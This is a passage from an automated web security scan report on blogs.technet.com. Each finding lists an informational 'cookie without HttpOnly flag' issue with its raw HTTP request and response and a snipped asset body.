GIF89a..................f..3..............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3..............f..3..............f..3..............f..3....f..f..f..ff.f3.f..3..3..
...[SNIP]...
15.91. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/resources/ShareThis.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /CustomWidgets/SocialMediaSharingUC/resources/ShareThis.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /CustomWidgets/SocialMediaSharingUC/resources/ShareThis.js HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9; CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a31%3a57+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: application/x-javascript
Last-Modified: Thu, 27 Jan 2011 20:43:01 GMT
Accept-Ranges: bytes
ETag: "80b8afc962becb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a32%3a05+GMT; expires=Sun, 25-Mar-2012 01:32:05 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:45:48 GMT
Content-Length: 2230

...//Executes the function when the DOM is ready to be used
$(document).ready(function() {

$('a.iconsOnPanel').each(function(index) {
var rawUrl = $(this).attr("href");
rawUr
...[SNIP]...
15.92. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/resources/sharethis.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /CustomWidgets/SocialMediaSharingUC/resources/sharethis.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /CustomWidgets/SocialMediaSharingUC/resources/sharethis.css HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9; CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a31%3a57+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: text/css
Last-Modified: Thu, 27 Jan 2011 20:43:01 GMT
Accept-Ranges: bytes
ETag: "80b8afc962becb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a27%3a57+GMT; expires=Sun, 25-Mar-2012 01:27:57 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:45:47 GMT
Content-Length: 930

.ShareThisMainPanel
{
   background-color: #ffffff;
   vertical-align: bottom;
   float: right;
   width: 130px;
   text-align: left;
   margin-left: 10px;
   z-index: 2000;
}
.ShareThis_ChildRootPanel
{
...[SNIP]...
15.93. http://blogs.technet.com/Utility/FooterFragments/Core/UserInfoPopup.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /Utility/FooterFragments/Core/UserInfoPopup.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Utility/FooterFragments/Core/UserInfoPopup.js?Version=5.5.134.13807&LastChanged=634317577742245126 HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9; CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a31%3a57+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: application/x-javascript
Last-Modified: Thu, 27 Jan 2011 20:42:54 GMT
Accept-Ranges: bytes
ETag: "09b83c562becb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Mon%2c+13+Dec+2010+00%3a46%3a46+GMT&mra=Sat%2c+26+Mar+2011+01%3a46%3a21+GMT; expires=Sun, 25-Mar-2012 01:46:21 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:46:20 GMT
Content-Length: 6913


function Core_UserInfoPopup_AttachToUserElements(context)
{
$('.internal-link.view-user-profile, .internal-link.view-profile, .avatar > a')
.live("mouseover", function() { Core_UserIn
...[SNIP]...
15.94. http://blogs.technet.com/analyticsid.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /analyticsid.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /analyticsid.aspx HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9; CommunityServer-UserCookie1001=lv=Mon%2c+13+Dec+2010+00%3a46%3a46+GMT&mra=Sat%2c+26+Mar+2011+01%3a34%3a31+GMT

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Mon%2c+13+Dec+2010+00%3a46%3a46+GMT&mra=Sat%2c+26+Mar+2011+01%3a45%3a52+GMT; expires=Sun, 25-Mar-2012 01:45:52 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:45:51 GMT
Content-Length: 67

<!--
gAnalyticsId="e14f9228-b1a1-4555-b530-1be10b6d7116";
// -->
15.95. http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a45%3a38+GMT; expires=Sun, 25-Mar-2012 01:45:38 GMT; path=/
Set-Cookie: CommunityServer-LastVisitUpdated-1001=; path=/
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN
X-Pingback: http://blogs.technet.com/b/mmpc/pingback.aspx
X-AspNet-Version: 2.0.50727
Set-Cookie: AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9; expires=Sun, 27-Mar-2011 01:45:38 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:45:37 GMT
Content-Length: 72506


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
15.96. http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Components-PostAttachments/00-03-20-04-44/MPC_2D00_BlogBanner.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /cfs-file.ashx/__key/CommunityServer-Components-PostAttachments/00-03-20-04-44/MPC_2D00_BlogBanner.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cfs-file.ashx/__key/CommunityServer-Components-PostAttachments/00-03-20-04-44/MPC_2D00_BlogBanner.png HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9; omniID=1301103997741_d54d_515d_2778_de1e1091d8c5; s_cc=true; s_sq=%5B%5BB%5D%5D; CommunityServer-UserCookie1001=lv=Mon%2c+13+Dec+2010+00%3a46%3a46+GMT&mra=Sat%2c+26+Mar+2011+01%3a45%3a57+GMT

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Pragma: no-cache
Location: http://blogs.technet.com/cfs-filesystemfile.ashx/__key/CommunityServer-Components-PostAttachments/00-03-20-04-44/MPC_2D00_BlogBanner.png
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Mon%2c+13+Dec+2010+00%3a46%3a46+GMT&mra=Sat%2c+26+Mar+2011+01%3a45%3a59+GMT; expires=Sun, 25-Mar-2012 01:45:59 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:45:59 GMT
Content-Length: 0

15.97. http://blogs.technet.com/cfs-filesystemfile.ashx/__key/CommunityServer-Components-PostAttachments/00-03-20-04-44/MPC_2D00_BlogBanner.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /cfs-filesystemfile.ashx/__key/CommunityServer-Components-PostAttachments/00-03-20-04-44/MPC_2D00_BlogBanner.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cfs-filesystemfile.ashx/__key/CommunityServer-Components-PostAttachments/00-03-20-04-44/MPC_2D00_BlogBanner.png HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9; omniID=1301103997741_d54d_515d_2778_de1e1091d8c5; s_cc=true; s_sq=%5B%5BB%5D%5D; CommunityServer-UserCookie1001=lv=Mon%2c+13+Dec+2010+00%3a46%3a46+GMT&mra=Sat%2c+26+Mar+2011+01%3a45%3a59+GMT

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 54952
Content-Type: image/png
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Mon%2c+13+Dec+2010+00%3a46%3a46+GMT&mra=Sat%2c+26+Mar+2011+01%3a46%3a00+GMT; expires=Sun, 25-Mar-2012 01:46:00 GMT; path=/
Content-disposition: inline; filename=MPC-BlogBanner.png
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:46:00 GMT

.PNG
.
...IHDR.....................sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<...&IDATx^....6.u...6P.._.]4.......6..gl..c#..%..Z.B.eYW......^..%Y...k..l..6T.Mu..X@U......z.
...[SNIP]...
15.98. http://blogs.technet.com/photos/mmpcblog/images/3200444/original.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /photos/mmpcblog/images/3200444/original.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /photos/mmpcblog/images/3200444/original.aspx HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9; CommunityServer-UserCookie1001=lv=Mon%2c+13+Dec+2010+00%3a46%3a46+GMT&mra=Sat%2c+26+Mar+2011+01%3a34%3a31+GMT; omniID=1301103997741_d54d_515d_2778_de1e1091d8c5; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Location: /cfs-file.ashx/__key/CommunityServer-Components-PostAttachments/00-03-20-04-44/MPC_2D00_BlogBanner.png
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Mon%2c+13+Dec+2010+00%3a46%3a46+GMT&mra=Sat%2c+26+Mar+2011+01%3a45%3a57+GMT; expires=Sun, 25-Mar-2012 01:45:57 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:45:56 GMT
Content-Length: 0

15.99. http://blogs.technet.com/themes/TechNet/Images/MediaGalleries/icon-share.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /themes/TechNet/Images/MediaGalleries/icon-share.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/TechNet/Images/MediaGalleries/icon-share.gif HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9; CommunityServer-UserCookie1001=lv=Mon%2c+13+Dec+2010+00%3a46%3a46+GMT&mra=Sat%2c+26+Mar+2011+01%3a34%3a31+GMT; omniID=1301103997741_d54d_515d_2778_de1e1091d8c5; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: image/gif
Last-Modified: Thu, 27 Jan 2011 20:43:55 GMT
Accept-Ranges: bytes
ETag: "bf1a6ea62becb1:0"
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a21%3a10+GMT; expires=Sun, 25-Mar-2012 01:21:10 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:45:58 GMT
Content-Length: 193

GIF89a
.
................n.n...................v....2.2T.TF.F................................................!.......,....
.
...>.$J.........A..D....A.....B.X.H..B.p0D....h.....6k.D....@..Q..;
15.100. http://blogs.technet.com/themes/TechNet/Images/Weblogs/icon-home.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /themes/TechNet/Images/Weblogs/icon-home.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/TechNet/Images/Weblogs/icon-home.gif HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9; CommunityServer-UserCookie1001=lv=Mon%2c+13+Dec+2010+00%3a46%3a46+GMT&mra=Sat%2c+26+Mar+2011+01%3a34%3a31+GMT; omniID=1301103997741_d54d_515d_2778_de1e1091d8c5; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: image/gif
Last-Modified: Thu, 27 Jan 2011 20:43:57 GMT
Accept-Ranges: bytes
ETag: "a76a24eb62becb1:0"
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a21%3a10+GMT; expires=Sun, 25-Mar-2012 01:21:10 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:45:58 GMT
Content-Length: 889

GIF89a    .    ....v.q|.t}.t.jB..W..Z..o..Y..[..^..\.._.._..d..b..e..b..g..}..................................................................................................................................
...[SNIP]...
15.101. http://blogs.technet.com/themes/TechNet/Images/Weblogs/icon-info.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /themes/TechNet/Images/Weblogs/icon-info.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/TechNet/Images/Weblogs/icon-info.gif HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9; CommunityServer-UserCookie1001=lv=Mon%2c+13+Dec+2010+00%3a46%3a46+GMT&mra=Sat%2c+26+Mar+2011+01%3a34%3a31+GMT; omniID=1301103997741_d54d_515d_2778_de1e1091d8c5; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: image/gif
Last-Modified: Thu, 27 Jan 2011 20:43:57 GMT
Accept-Ranges: bytes
ETag: "49ca25eb62becb1:0"
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Mon%2c+13+Dec+2010+00%3a46%3a46+GMT&mra=Sat%2c+26+Mar+2011+01%3a45%3a58+GMT; expires=Sun, 25-Mar-2012 01:45:58 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:45:58 GMT
Content-Length: 895

GIF89a    .    ....h..g..b..m..v..z..z..z..f..k..m..m..u..t..{..x..z..}..k..~..x..|..~..|..|..s..}..}.........................................................................................................
...[SNIP]...
15.102. http://blogs.technet.com/themes/TechNet/Images/Weblogs/icon-rss.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /themes/TechNet/Images/Weblogs/icon-rss.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/TechNet/Images/Weblogs/icon-rss.gif HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9; CommunityServer-UserCookie1001=lv=Mon%2c+13+Dec+2010+00%3a46%3a46+GMT&mra=Sat%2c+26+Mar+2011+01%3a34%3a31+GMT; omniID=1301103997741_d54d_515d_2778_de1e1091d8c5; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: image/gif
Last-Modified: Thu, 27 Jan 2011 20:43:57 GMT
Accept-Ranges: bytes
ETag: "8d8928eb62becb1:0"
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a21%3a39+GMT; expires=Sun, 25-Mar-2012 01:21:39 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:45:58 GMT
Content-Length: 301

GIF89a    .    .....N.....X..<.X3.[3.]3.a3..8..3.....%.~3.~&..A..3.....;..M.}b..~..X.....=..b..4..;..3.xM.....:..d..;.c3..3.jM.....M.......~M..!..&..9..0.p3.y3..'..+.u3..f..3..-..3.........................
...[SNIP]...
15.103. http://blogs.technet.com/themes/TechNet/css/DynamicStyle.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /themes/TechNet/css/DynamicStyle.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/TechNet/css/DynamicStyle.aspx?PreviewKey=0 HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a45%3a38+GMT; CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: text/css; charset=utf-8
Expires: Sat, 26 Mar 2011 02:16:07 GMT
